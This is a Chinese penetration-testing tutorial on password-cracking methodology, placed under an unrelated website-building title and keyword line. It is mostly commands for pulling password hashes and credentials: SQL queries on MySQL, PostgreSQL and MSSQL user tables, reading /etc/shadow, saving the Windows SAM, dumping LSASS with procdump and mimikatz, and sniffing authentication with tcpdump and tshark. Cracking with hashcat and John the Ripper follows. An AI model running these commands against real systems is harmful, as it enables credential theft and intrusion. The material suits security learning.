企业官网建设流程全解析

网站打开后显示建设中,wordpress分类搜索,做热处理工艺的网站有哪些,做花茶的网站郑重声明#xff1a;本文所涉安全技术仅限用于合法研究与学习目的#xff0c;严禁任何形式的非法利用。因不当使用所导致的一切法律与经济责任#xff0c;本人概不负责。任何形式的转载均须明确标注原文出处#xff0c;且不得用于商业目的。 #x1f50b; 点赞 | 能量注入…郑重声明本文所涉安全技术仅限用于合法研究与学习目的严禁任何形式的非法利用。因不当使用所导致的一切法律与经济责任本人概不负责。任何形式的转载均须明确标注原文出处且不得用于商业目的。点赞| 能量注入 ❤️关注| 信号锁定 收藏| 数据归档 ⭐️评论| 保持连接立即前往晖度丨安全视界​​​​​​​​▶ 信息收集▶ 漏洞检测▶ 初始立足点 ➢ 密码攻击 ➢ 密码破解理论下▶ 权限提升▶ 横向移动▶ 报告/分析▶ 教训/修复目录1.密码破解理论1.1 密码破解流程1.1.1 哈希破解五步流程图1.1.2 各步骤详细说明1.1.2.1 提取哈希值1.数据库表提取①MySQL/MariaDB②PostgreSQL③MSSQL2.系统文件提取①Linux/Unix系统②Windows系统3.内存提取①Windows系统②Linux系统4.网络流量提取①通用抓包②提取Web认证哈希③提取数据库通信哈希1.1.2.2 格式化哈希值1.哈希格式处理2.哈希类型识别1.1.2.3 计算破解时间1.1.2.4 准备变异字典1.1.2.5 攻击哈希值1.关键检查点2.破解成功验证3.常见陷阱与规避方法1.1.3 迭代优化循环1.1.4 方法论核心原则欢迎❤️ 点赞 | 关注 | ⭐️ 收藏 | 评论1.密码破解理论1.1 密码破解流程1.1.1 哈希破解五步流程图​ 破解步骤详解步骤名称关键操作工具/方法注意事项①提取哈希值从目标系统获取哈希- 数据库转储- 内存提取- 文件提取确保哈希完整性避免截断②格式化哈希值识别并转换格式- hash-identifier- hashid- 专用转换工具精确识别哈希算法避免格式错误③计算破解时间评估可行性公式破解时间 密钥空间 ÷ 哈希速率考虑测试时间窗口避免不切实际的尝试④准备变异字典增强字典攻击效果- 基于规则变异- 分析密码策略- 参考泄露数据优先使用变异字典而非原始字典⑤攻击哈希值执行破解操作Hashcat、John the Ripper等注意哈希值输入格式确认算法类型1.1.2 各步骤详细说明1.1.2.1 提取哈希值来源位置提取方法具体命令/工具输出示例数据库表SQL查询转储MySQL:SELECT user, password FROM users;PostgreSQL:SELECT usename, passwd FROM pg_shadow;admin:5f4dcc3b5aa765d61d8327deb882cf99系统文件文件读取Linux:cat /etc/shadowWindows:reg save HKLM\SAM sam.saveroot:$6$...:18959:0:99999:7:::内存内存转储分析Windows:procdump.exe -ma lsass.exe lsass.dmpLinux:gcore -o core.pidLSASS进程内存文件网络流量抓包分析tcpdump -i eth0 -w capture.pcaptshark -r capture.pcap -Y http.authbasicHTTP Basic认证头️ 实用工具集工具用途示例命令hashcat密码破解hashcat -m 0 hash.txt rockyou.txtjohn密码破解john --formatraw-md5 hash.txtmimikatzWindows凭据提取sekurlsa::logonpasswordspwdumpWindows哈希提取pwdump.exe system.save sam.savetcpdump网络抓包tcpdump -i eth0 -w capture.pcapWireshark网络分析GUI分析或tshark命令行sqlmap数据库渗透sqlmap -u http://site.com --passwords1.数据库表提取①MySQL/MariaDB-- 标准查询需适当权限SELECTuser, authentication_stringFROMmysql.user;-- 旧版本或特定格式SELECTuser, passwordFROMmysql.user;-- 导出到文件命令行mysql-u root-p-e SELECT user, authentication_string FROM mysql.userhashes.txt②PostgreSQL-- 查询用户密码哈希SELECTusename, passwdFROMpg_shadow;-- 导出到文件\copy(SELECTusename, passwdFROMpg_shadow)TO/tmp/pg_hashes.csvWITHCSV;③MSSQL-- SQL ServerSELECTname, password_hashFROMsys.sql_logins;-- 配合解密需特权SELECTname,CAST(passwordASvarchar(100))FROMsys.syslogins;2.系统文件提取①Linux/Unix系统# 读取shadow文件需rootsudocat/etc/shadow# 仅提取用户名和哈希sudo awk -F:{print $1:$2}/etc/shadow# 备份文件历史哈希cat/etc/shadow-# 备份文件cat/etc/passwd# 部分旧系统密码哈希# 提取特定用户sudo grep -E^(root|admin):/etc/shadow②Windows系统# 方法1使用reg命令导出SAMreg save HKLM\SAM C:\sam.save reg save HKLM\SYSTEM C:\system.save# 方法2使用Mimikatz需管理员privilege::debug token::elevate lsadump::sam# 方法3PowerShell提取Copy-Item C:\Windows\System32\config\SAM C:\temp\sam.bak Copy-Item C:\Windows\System32\config\SYSTEM C:\temp\system.bak3.内存提取①Windows系统# 方法1使用Procdump微软官方工具procdump.exe -accepteula -ma lsass.exe lsass.dmp# 方法2使用Mimikatz内存提取mimikatz.exe privilege::debug sekurlsa::logonpasswords full# 方法3使用Task Manager# 右键lsass.exe → Create dump file②Linux系统# 提取所有进程内存sudo gcore -o /tmp/core.pid [PID]# 查找特定进程ps aux | grep [process_name]# 提取SSH密钥等sudo strings /proc/[pid]/mem | grep -issh# 使用LiME内核模块insmod lime.kopath/tmp/memdump.lime formatlime4.网络流量提取①通用抓包# 使用tcpdumpsudo tcpdump -i eth0 -s 0 -w capture.pcap port 80 or port 443# 使用tshark过滤tshark -r capture.pcap -Yhttp.request.method POST-T fields -e http.authbasic# 实时监控HTTP认证sudo tcpdump -i eth0 -A -s 0tcp port 80 and (((ip[2:2] - ((ip[0]0xf)2)) - ((tcp[12]0xf0)2)) ! 0)| grep -EAuthorization:|password|passwd②提取Web认证哈希# 提取HTTP Basic认证tshark -r capture.pcap -Yhttp.authbasic-T fields -e http.authbasic |base64-d# 提取Cookie/Sessiontshark -r capture.pcap -Yhttp.cookie-T fields -e http.cookie# 提取表单提交的密码tshark -r capture.pcap -Yhttp.request.method POST-T fields -e http.file_data | grep -i password③提取数据库通信哈希# MySQL认证抓取sudo tcpdump -i eth0 -s 0 -w mysql.pcap port 3306# 分析MySQL握手包tshark -r mysql.pcap -Ymysql-T fields -e mysql.auth_response# PostgreSQL认证tshark -r capture.pcap -Ypgsql-T fields -e pgsql.auth_response1.1.2.2 格式化哈希值1.哈希格式处理# 清理提取的哈希值# 移除空格和特殊字符sed -is/[[:space:]]//ghashes.txt# 仅保留有效哈希行grep -E^[a-fA-F0-9]{32,128}$hashes.txt clean_hashes.txt# 分割用户名和哈希awk -F:{print $2 hashes_only.txt}extracted.txt2.哈希类型识别任务工具使用示例输出目标识别算法hash-identifierhashid 5f4dcc3b5aa765d61d8327deb882cf99MD5、SHA1等验证格式人工检查查看长度、字符集符合工具要求格式转换格式脚本工具john --formatraw-md5 hash.txt标准哈希文件格式# 使用hash-identifierhash-identifier# 粘贴哈希值进行识别# 使用hashidhashid 5f4dcc3b5aa765d61d8327deb882cf99# 文件批量识别hashid -j hashes.txt1.1.2.3 计算破解时间计算公式破解时间(秒) 密钥空间大小 ÷ 哈希计算速率(次/秒)参数定义如何确定密钥空间所有可能密码的组合数字符集长度^密码长度哈希速率每秒可尝试的哈希次数工具基准测试或硬件规格实际时间考虑概率的期望时间密钥空间 ÷ 2 ÷ 哈希速率可行性判断标准时间范围建议行动 1小时立即执行1小时 - 1天安排进行1天 - 1周评估必要性 1周放弃或换方法1.1.2.4 准备变异字典本部分的内容具体详见上一篇文章。准备策略实施方法优势规则变异使用规则文件自动修改覆盖用户常见修改模式策略分析研究目标密码策略要求针对性更强效率更高泄露数据整合已知泄露密码利用用户重复使用密码习惯混合攻击组合多个字典和规则覆盖更广泛的可能性1.1.2.5 攻击哈希值1.关键检查点检查项常见问题解决方法哈希值多余空格/换行使用cat -A检查隐藏字符算法类型多种算法特征相似使用多个工具交叉验证工具配置参数错误先用已知哈希测试工具输出结果破解成功但未显示检查工具输出级别设置2.破解成功验证# 验证破解结果$echo破解出的密码| hashcat -m 算法ID 目标哈希 --stdout# 比较输出的哈希值与目标是否一致3.常见陷阱与规避方法陷阱表现规避方法哈希识别错误长时间无结果使用多个识别工具交叉验证格式错误工具报错无效哈希检查样例格式使用转换脚本时间估计偏差远超过预估时间定期检查进度设置时间限制字典不足多次尝试无结果组合多个来源字典添加规则变异硬件限制破解速度极慢考虑GPU加速或云服务1.1.3 迭代优化循环尝试破解 → 分析结果 → 调整策略 → 再次尝试 ↑ ↓ └───────────────────────────────┘现象可能调整无任何命中扩大字典范围增加规则部分相似密码命中针对性地设计新规则时间过长缩小密钥空间聚焦高概率密码1.1.4 方法论核心原则准备优于蛮力充分的准备字典、规则比单纯增加计算能力更有效验证先行在长时间运行前验证哈希格式、工具配置时间意识始终考虑时间成本设置合理的期望和截止点迭代优化基于每次尝试的结果不断优化策略多样化尝试不依赖单一方法准备多种攻击路径成功的关键在于系统化的方法和持续的优化而非单纯依赖计算能力。下文开始按照本文的流程进行完整的密码破解的实践。欢迎❤️ 点赞 | 关注 | ⭐️ 收藏 | 评论每一份支持都是我持续输出的光。​